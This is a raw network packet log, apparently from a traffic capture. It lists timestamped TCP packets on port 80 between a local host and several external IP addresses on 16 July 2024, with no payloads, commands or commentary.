                            Jul 16, 2024 07:22:21.846960068 CEST4974280192.168.2.4216.194.173.237
                            Jul 16, 2024 07:22:22.783235073 CEST4974280192.168.2.4216.194.173.237
                            Jul 16, 2024 07:22:23.802063942 CEST4974380192.168.2.4216.194.173.237
                            Jul 16, 2024 07:22:23.807667971 CEST8049743216.194.173.237192.168.2.4
                            Jul 16, 2024 07:22:23.811645985 CEST4974380192.168.2.4216.194.173.237
                            Jul 16, 2024 07:22:23.814245939 CEST4974380192.168.2.4216.194.173.237
                            Jul 16, 2024 07:22:23.819611073 CEST8049743216.194.173.237192.168.2.4
                            Jul 16, 2024 07:22:24.405503035 CEST8049743216.194.173.237192.168.2.4
                            Jul 16, 2024 07:22:24.406090975 CEST8049743216.194.173.237192.168.2.4
                            Jul 16, 2024 07:22:24.406167030 CEST4974380192.168.2.4216.194.173.237
                            Jul 16, 2024 07:22:25.329097033 CEST4974380192.168.2.4216.194.173.237
                            Jul 16, 2024 07:22:26.348802090 CEST4974480192.168.2.4216.194.173.237
                            Jul 16, 2024 07:22:26.353841066 CEST8049744216.194.173.237192.168.2.4
                            Jul 16, 2024 07:22:26.353925943 CEST4974480192.168.2.4216.194.173.237
                            Jul 16, 2024 07:22:26.356976032 CEST4974480192.168.2.4216.194.173.237
                            Jul 16, 2024 07:22:26.362166882 CEST8049744216.194.173.237192.168.2.4
                            Jul 16, 2024 07:22:26.362186909 CEST8049744216.194.173.237192.168.2.4
                            Jul 16, 2024 07:22:26.362199068 CEST8049744216.194.173.237192.168.2.4
                            Jul 16, 2024 07:22:26.362210989 CEST8049744216.194.173.237192.168.2.4
                            Jul 16, 2024 07:22:26.362222910 CEST8049744216.194.173.237192.168.2.4
                            Jul 16, 2024 07:22:26.362234116 CEST8049744216.194.173.237192.168.2.4
                            Jul 16, 2024 07:22:26.362246037 CEST8049744216.194.173.237192.168.2.4
                            Jul 16, 2024 07:22:26.362257957 CEST8049744216.194.173.237192.168.2.4
                            Jul 16, 2024 07:22:26.362271070 CEST8049744216.194.173.237192.168.2.4
                            Jul 16, 2024 07:22:26.963517904 CEST8049744216.194.173.237192.168.2.4
                            Jul 16, 2024 07:22:26.963593006 CEST8049744216.194.173.237192.168.2.4
                            Jul 16, 2024 07:22:26.963646889 CEST4974480192.168.2.4216.194.173.237
                            Jul 16, 2024 07:22:27.860393047 CEST4974480192.168.2.4216.194.173.237
                            Jul 16, 2024 07:22:28.887805939 CEST4974580192.168.2.4216.194.173.237
                            Jul 16, 2024 07:22:28.893317938 CEST8049745216.194.173.237192.168.2.4
                            Jul 16, 2024 07:22:28.893436909 CEST4974580192.168.2.4216.194.173.237
                            Jul 16, 2024 07:22:28.906313896 CEST4974580192.168.2.4216.194.173.237
                            Jul 16, 2024 07:22:28.911695957 CEST8049745216.194.173.237192.168.2.4
                            Jul 16, 2024 07:22:29.476762056 CEST8049745216.194.173.237192.168.2.4
                            Jul 16, 2024 07:22:29.476826906 CEST8049745216.194.173.237192.168.2.4
                            Jul 16, 2024 07:22:29.477037907 CEST4974580192.168.2.4216.194.173.237
                            Jul 16, 2024 07:22:29.479130030 CEST4974580192.168.2.4216.194.173.237
                            Jul 16, 2024 07:22:29.484250069 CEST8049745216.194.173.237192.168.2.4
                            Jul 16, 2024 07:22:34.509237051 CEST4974680192.168.2.43.33.130.190
                            Jul 16, 2024 07:22:34.514332056 CEST80497463.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:34.514439106 CEST4974680192.168.2.43.33.130.190
                            Jul 16, 2024 07:22:34.516191959 CEST4974680192.168.2.43.33.130.190
                            Jul 16, 2024 07:22:34.521137953 CEST80497463.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:34.971210957 CEST80497463.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:34.971394062 CEST4974680192.168.2.43.33.130.190
                            Jul 16, 2024 07:22:36.032202005 CEST4974680192.168.2.43.33.130.190
                            Jul 16, 2024 07:22:36.043549061 CEST80497463.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:37.050620079 CEST4974780192.168.2.43.33.130.190
                            Jul 16, 2024 07:22:37.056202888 CEST80497473.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:37.056332111 CEST4974780192.168.2.43.33.130.190
                            Jul 16, 2024 07:22:37.058175087 CEST4974780192.168.2.43.33.130.190
                            Jul 16, 2024 07:22:37.064677000 CEST80497473.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:37.533665895 CEST80497473.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:37.533803940 CEST4974780192.168.2.43.33.130.190
                            Jul 16, 2024 07:22:38.563519001 CEST4974780192.168.2.43.33.130.190
                            Jul 16, 2024 07:22:38.568595886 CEST80497473.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:39.583544970 CEST4974880192.168.2.43.33.130.190
                            Jul 16, 2024 07:22:39.588756084 CEST80497483.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:39.588952065 CEST4974880192.168.2.43.33.130.190
                            Jul 16, 2024 07:22:39.591182947 CEST4974880192.168.2.43.33.130.190
                            Jul 16, 2024 07:22:39.596278906 CEST80497483.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:39.596297026 CEST80497483.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:39.596308947 CEST80497483.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:39.596323967 CEST80497483.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:39.596337080 CEST80497483.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:39.596363068 CEST80497483.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:39.596406937 CEST80497483.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:39.596419096 CEST80497483.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:39.596435070 CEST80497483.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:40.045432091 CEST80497483.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:40.045535088 CEST4974880192.168.2.43.33.130.190
                            Jul 16, 2024 07:22:41.095632076 CEST4974880192.168.2.43.33.130.190
                            Jul 16, 2024 07:22:41.101011992 CEST80497483.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:42.114772081 CEST4974980192.168.2.43.33.130.190
                            Jul 16, 2024 07:22:42.656085968 CEST80497493.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:42.656232119 CEST4974980192.168.2.43.33.130.190
                            Jul 16, 2024 07:22:42.658550024 CEST4974980192.168.2.43.33.130.190
                            Jul 16, 2024 07:22:42.663882017 CEST80497493.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:43.121315956 CEST80497493.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:43.121376038 CEST80497493.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:43.121850967 CEST4974980192.168.2.43.33.130.190
                            Jul 16, 2024 07:22:43.124417067 CEST4974980192.168.2.43.33.130.190
                            Jul 16, 2024 07:22:43.132240057 CEST80497493.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:48.146617889 CEST4975080192.168.2.4212.227.172.254
                            Jul 16, 2024 07:22:48.152178049 CEST8049750212.227.172.254192.168.2.4
                            Jul 16, 2024 07:22:48.152252913 CEST4975080192.168.2.4212.227.172.254
                            Jul 16, 2024 07:22:48.154267073 CEST4975080192.168.2.4212.227.172.254
                            Jul 16, 2024 07:22:48.159418106 CEST8049750212.227.172.254192.168.2.4
                            Jul 16, 2024 07:22:48.798825026 CEST8049750212.227.172.254192.168.2.4
                            Jul 16, 2024 07:22:48.798886061 CEST8049750212.227.172.254192.168.2.4
                            Jul 16, 2024 07:22:48.803620100 CEST4975080192.168.2.4212.227.172.254
                            Jul 16, 2024 07:22:49.659646988 CEST4975080192.168.2.4212.227.172.254
                            Jul 16, 2024 07:22:50.677115917 CEST4975180192.168.2.4212.227.172.254
                            Jul 16, 2024 07:22:50.682364941 CEST8049751212.227.172.254192.168.2.4
                            Jul 16, 2024 07:22:50.682483912 CEST4975180192.168.2.4212.227.172.254
                            Jul 16, 2024 07:22:50.684969902 CEST4975180192.168.2.4212.227.172.254
                            Jul 16, 2024 07:22:50.690272093 CEST8049751212.227.172.254192.168.2.4
                            Jul 16, 2024 07:22:51.327538967 CEST8049751212.227.172.254192.168.2.4
                            Jul 16, 2024 07:22:51.327651978 CEST8049751212.227.172.254192.168.2.4
                            Jul 16, 2024 07:22:51.328035116 CEST4975180192.168.2.4212.227.172.254
                            Jul 16, 2024 07:22:52.188476086 CEST4975180192.168.2.4212.227.172.254
                            Jul 16, 2024 07:22:53.210655928 CEST4975280192.168.2.4212.227.172.254
                            Jul 16, 2024 07:22:53.216140985 CEST8049752212.227.172.254192.168.2.4
                            Jul 16, 2024 07:22:53.219820976 CEST4975280192.168.2.4212.227.172.254
                            Jul 16, 2024 07:22:53.221884966 CEST4975280192.168.2.4212.227.172.254
                            Jul 16, 2024 07:22:53.227293015 CEST8049752212.227.172.254192.168.2.4
                            Jul 16, 2024 07:22:53.227335930 CEST8049752212.227.172.254192.168.2.4
                            Jul 16, 2024 07:22:53.227365971 CEST8049752212.227.172.254192.168.2.4
                            Jul 16, 2024 07:22:53.227447987 CEST8049752212.227.172.254192.168.2.4
                            Jul 16, 2024 07:22:53.227475882 CEST8049752212.227.172.254192.168.2.4
                            Jul 16, 2024 07:22:53.227503061 CEST8049752212.227.172.254192.168.2.4
                            Jul 16, 2024 07:22:53.227530956 CEST8049752212.227.172.254192.168.2.4
                            Jul 16, 2024 07:22:53.227586031 CEST8049752212.227.172.254192.168.2.4
                            Jul 16, 2024 07:22:53.227613926 CEST8049752212.227.172.254192.168.2.4
                            Jul 16, 2024 07:22:53.857085943 CEST8049752212.227.172.254192.168.2.4
                            Jul 16, 2024 07:22:53.907275915 CEST4975280192.168.2.4212.227.172.254
                            Jul 16, 2024 07:22:53.947686911 CEST8049752212.227.172.254192.168.2.4
                            Jul 16, 2024 07:22:53.947882891 CEST4975280192.168.2.4212.227.172.254
                            Jul 16, 2024 07:22:54.735646009 CEST4975280192.168.2.4212.227.172.254
                            Jul 16, 2024 07:22:55.756382942 CEST4975380192.168.2.4212.227.172.254
                            Jul 16, 2024 07:22:55.761682987 CEST8049753212.227.172.254192.168.2.4
                            Jul 16, 2024 07:22:55.761776924 CEST4975380192.168.2.4212.227.172.254
                            Jul 16, 2024 07:22:55.764309883 CEST4975380192.168.2.4212.227.172.254
                            Jul 16, 2024 07:22:55.769730091 CEST8049753212.227.172.254192.168.2.4
                            Jul 16, 2024 07:22:56.388250113 CEST8049753212.227.172.254192.168.2.4
                            Jul 16, 2024 07:22:56.388748884 CEST8049753212.227.172.254192.168.2.4
                            Jul 16, 2024 07:22:56.388808966 CEST4975380192.168.2.4212.227.172.254
                            Jul 16, 2024 07:22:56.392081976 CEST4975380192.168.2.4212.227.172.254
                            Jul 16, 2024 07:22:56.396956921 CEST8049753212.227.172.254192.168.2.4
                            Jul 16, 2024 07:23:02.064857960 CEST4975480192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:02.069827080 CEST804975443.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:02.069904089 CEST4975480192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:02.071733952 CEST4975480192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:02.076554060 CEST804975443.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:03.163319111 CEST804975443.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:03.163382053 CEST804975443.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:03.163415909 CEST804975443.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:03.163469076 CEST4975480192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:03.163578987 CEST804975443.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:03.163615942 CEST804975443.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:03.163650990 CEST804975443.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:03.163702011 CEST4975480192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:03.164231062 CEST804975443.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:03.164268017 CEST804975443.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:03.164303064 CEST804975443.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:03.164310932 CEST4975480192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:03.164391994 CEST4975480192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:03.164395094 CEST804975443.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:03.164855003 CEST4975480192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:03.168534994 CEST804975443.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:03.168785095 CEST804975443.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:03.168818951 CEST804975443.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:03.168860912 CEST4975480192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:03.168926001 CEST4975480192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:03.579371929 CEST4975480192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:04.597775936 CEST4975580192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:04.603123903 CEST804975543.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:04.603238106 CEST4975580192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:04.604759932 CEST4975580192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:04.609961987 CEST804975543.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:05.706542015 CEST804975543.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:05.706624031 CEST804975543.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:05.706666946 CEST804975543.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:05.706700087 CEST804975543.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:05.706733942 CEST804975543.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:05.706743002 CEST4975580192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:05.706765890 CEST804975543.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:05.706793070 CEST4975580192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:05.706801891 CEST804975543.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:05.707221985 CEST4975580192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:05.707444906 CEST804975543.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:05.707479954 CEST804975543.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:05.707515001 CEST804975543.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:05.707550049 CEST4975580192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:05.710552931 CEST4975580192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:05.711733103 CEST804975543.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:05.711896896 CEST804975543.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:05.711930037 CEST804975543.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:05.711965084 CEST4975580192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:05.714912891 CEST4975580192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:06.110333920 CEST4975580192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:07.129820108 CEST4975680192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:07.307934999 CEST804975643.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:07.312196970 CEST4975680192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:07.312196970 CEST4975680192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:07.317441940 CEST804975643.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:07.317483902 CEST804975643.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:07.317513943 CEST804975643.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:07.317574024 CEST804975643.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:07.317605019 CEST804975643.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:07.317632914 CEST804975643.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:07.317661047 CEST804975643.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:07.317689896 CEST804975643.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:07.317718029 CEST804975643.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:08.399075985 CEST804975643.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:08.399163008 CEST804975643.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:08.399204016 CEST804975643.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:08.399223089 CEST4975680192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:08.399509907 CEST804975643.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:08.399543047 CEST804975643.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:08.399559975 CEST4975680192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:08.399580002 CEST804975643.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:08.399630070 CEST4975680192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:08.400146008 CEST804975643.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:08.400181055 CEST804975643.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:08.400213957 CEST804975643.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:08.400228024 CEST4975680192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:08.400250912 CEST804975643.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:08.400300980 CEST4975680192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:08.404232025 CEST804975643.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:08.404287100 CEST804975643.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:08.404337883 CEST4975680192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:08.813601017 CEST4975680192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:09.832230091 CEST4975780192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:09.838222027 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:09.838301897 CEST4975780192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:09.840444088 CEST4975780192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:09.845319986 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:10.928862095 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:10.928915977 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:10.928946972 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:10.928981066 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:10.929013014 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:10.929047108 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:10.929244995 CEST4975780192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:10.929245949 CEST4975780192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:10.929616928 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:10.929651976 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:10.929685116 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:10.929718971 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:10.929727077 CEST4975780192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:10.929868937 CEST4975780192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:10.934163094 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:10.934350967 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:10.934385061 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:10.941699982 CEST4975780192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:11.041223049 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:11.041310072 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:11.041347027 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:11.041537046 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:11.041573048 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:11.041883945 CEST4975780192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:11.041977882 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:11.042015076 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:11.042337894 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:11.042541981 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:11.042582035 CEST4975780192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:11.042782068 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:11.042814970 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:11.042866945 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:11.042902946 CEST4975780192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:11.043395042 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:11.043641090 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:11.043684959 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:11.043721914 CEST4975780192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:11.043994904 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:11.044027090 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:11.044060946 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:11.044248104 CEST4975780192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:11.044596910 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:11.044631958 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:11.044663906 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:11.045218945 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:11.045252085 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:11.045281887 CEST4975780192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:11.047050953 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:11.051879883 CEST4975780192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:11.128251076 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:11.154498100 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:11.154542923 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:11.154598951 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:11.154596090 CEST4975780192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:11.154638052 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:11.154671907 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:11.154679060 CEST4975780192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:11.154711008 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:11.154875994 CEST4975780192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:11.155261993 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:11.155297995 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:11.155447960 CEST4975780192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:11.155612946 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:11.155647993 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:11.155682087 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:11.155689001 CEST4975780192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:11.156248093 CEST4975780192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:11.156258106 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:11.156292915 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:11.156379938 CEST4975780192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:11.156553030 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:11.157947063 CEST4975780192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:11.159698963 CEST4975780192.168.2.443.157.128.107
                            Jul 16, 2024 07:23:11.164674044 CEST804975743.157.128.107192.168.2.4
                            Jul 16, 2024 07:23:16.843662977 CEST4975880192.168.2.4203.161.41.205
                            Jul 16, 2024 07:23:16.848845005 CEST8049758203.161.41.205192.168.2.4
                            Jul 16, 2024 07:23:16.853446960 CEST4975880192.168.2.4203.161.41.205
                            Jul 16, 2024 07:23:16.853446960 CEST4975880192.168.2.4203.161.41.205
                            Jul 16, 2024 07:23:16.858661890 CEST8049758203.161.41.205192.168.2.4
                            Jul 16, 2024 07:23:17.453159094 CEST8049758203.161.41.205192.168.2.4
                            Jul 16, 2024 07:23:17.453217030 CEST8049758203.161.41.205192.168.2.4
                            Jul 16, 2024 07:23:17.453380108 CEST4975880192.168.2.4203.161.41.205
                            Jul 16, 2024 07:23:18.360364914 CEST4975880192.168.2.4203.161.41.205
                            Jul 16, 2024 07:23:19.379077911 CEST4975980192.168.2.4203.161.41.205
                            Jul 16, 2024 07:23:19.384197950 CEST8049759203.161.41.205192.168.2.4
                            Jul 16, 2024 07:23:19.384329081 CEST4975980192.168.2.4203.161.41.205
                            Jul 16, 2024 07:23:19.386490107 CEST4975980192.168.2.4203.161.41.205
                            Jul 16, 2024 07:23:19.391493082 CEST8049759203.161.41.205192.168.2.4
                            Jul 16, 2024 07:23:19.976408958 CEST8049759203.161.41.205192.168.2.4
                            Jul 16, 2024 07:23:19.976998091 CEST8049759203.161.41.205192.168.2.4
                            Jul 16, 2024 07:23:19.977066994 CEST4975980192.168.2.4203.161.41.205
                            Jul 16, 2024 07:23:20.894083023 CEST4975980192.168.2.4203.161.41.205
                            Jul 16, 2024 07:23:21.911279917 CEST4976080192.168.2.4203.161.41.205
                            Jul 16, 2024 07:23:21.916254044 CEST8049760203.161.41.205192.168.2.4
                            Jul 16, 2024 07:23:21.916332960 CEST4976080192.168.2.4203.161.41.205
                            Jul 16, 2024 07:23:21.919085979 CEST4976080192.168.2.4203.161.41.205
                            Jul 16, 2024 07:23:21.924060106 CEST8049760203.161.41.205192.168.2.4
                            Jul 16, 2024 07:23:21.924091101 CEST8049760203.161.41.205192.168.2.4
                            Jul 16, 2024 07:23:21.924140930 CEST8049760203.161.41.205192.168.2.4
                            Jul 16, 2024 07:23:21.924169064 CEST8049760203.161.41.205192.168.2.4
                            Jul 16, 2024 07:23:21.924195051 CEST8049760203.161.41.205192.168.2.4
                            Jul 16, 2024 07:23:21.924388885 CEST8049760203.161.41.205192.168.2.4
                            Jul 16, 2024 07:23:21.924417973 CEST8049760203.161.41.205192.168.2.4
                            Jul 16, 2024 07:23:21.924464941 CEST8049760203.161.41.205192.168.2.4
                            Jul 16, 2024 07:23:21.924514055 CEST8049760203.161.41.205192.168.2.4
                            Jul 16, 2024 07:23:22.534718990 CEST8049760203.161.41.205192.168.2.4
                            Jul 16, 2024 07:23:22.534804106 CEST8049760203.161.41.205192.168.2.4
                            Jul 16, 2024 07:23:22.534863949 CEST4976080192.168.2.4203.161.41.205
                            Jul 16, 2024 07:23:23.426383972 CEST4976080192.168.2.4203.161.41.205
                            Jul 16, 2024 07:23:24.442778111 CEST4976180192.168.2.4203.161.41.205
                            Jul 16, 2024 07:23:24.448426008 CEST8049761203.161.41.205192.168.2.4
                            Jul 16, 2024 07:23:24.448529959 CEST4976180192.168.2.4203.161.41.205
                            Jul 16, 2024 07:23:24.450658083 CEST4976180192.168.2.4203.161.41.205
                            Jul 16, 2024 07:23:24.456073999 CEST8049761203.161.41.205192.168.2.4
                            Jul 16, 2024 07:23:25.054506063 CEST8049761203.161.41.205192.168.2.4
                            Jul 16, 2024 07:23:25.054567099 CEST8049761203.161.41.205192.168.2.4
                            Jul 16, 2024 07:23:25.054701090 CEST4976180192.168.2.4203.161.41.205
                            Jul 16, 2024 07:23:25.057974100 CEST4976180192.168.2.4203.161.41.205
                            Jul 16, 2024 07:23:25.063951969 CEST8049761203.161.41.205192.168.2.4
                            Jul 16, 2024 07:23:30.103565931 CEST4976280192.168.2.4103.176.91.154
                            Jul 16, 2024 07:23:30.108895063 CEST8049762103.176.91.154192.168.2.4
                            Jul 16, 2024 07:23:30.108969927 CEST4976280192.168.2.4103.176.91.154
                            Jul 16, 2024 07:23:30.110831022 CEST4976280192.168.2.4103.176.91.154
                            Jul 16, 2024 07:23:30.115679979 CEST8049762103.176.91.154192.168.2.4
                            Jul 16, 2024 07:23:30.903335094 CEST8049762103.176.91.154192.168.2.4
                            Jul 16, 2024 07:23:30.953897953 CEST8049762103.176.91.154192.168.2.4
                            Jul 16, 2024 07:23:30.959145069 CEST4976280192.168.2.4103.176.91.154
                            Jul 16, 2024 07:23:30.963840008 CEST4976280192.168.2.4103.176.91.154
                            Jul 16, 2024 07:23:31.627810001 CEST4976280192.168.2.4103.176.91.154
                            Jul 16, 2024 07:23:32.644712925 CEST4976380192.168.2.4103.176.91.154
                            Jul 16, 2024 07:23:32.649903059 CEST8049763103.176.91.154192.168.2.4
                            Jul 16, 2024 07:23:32.649983883 CEST4976380192.168.2.4103.176.91.154
                            Jul 16, 2024 07:23:32.651810884 CEST4976380192.168.2.4103.176.91.154
                            Jul 16, 2024 07:23:32.656665087 CEST8049763103.176.91.154192.168.2.4
                            Jul 16, 2024 07:23:33.446985006 CEST8049763103.176.91.154192.168.2.4
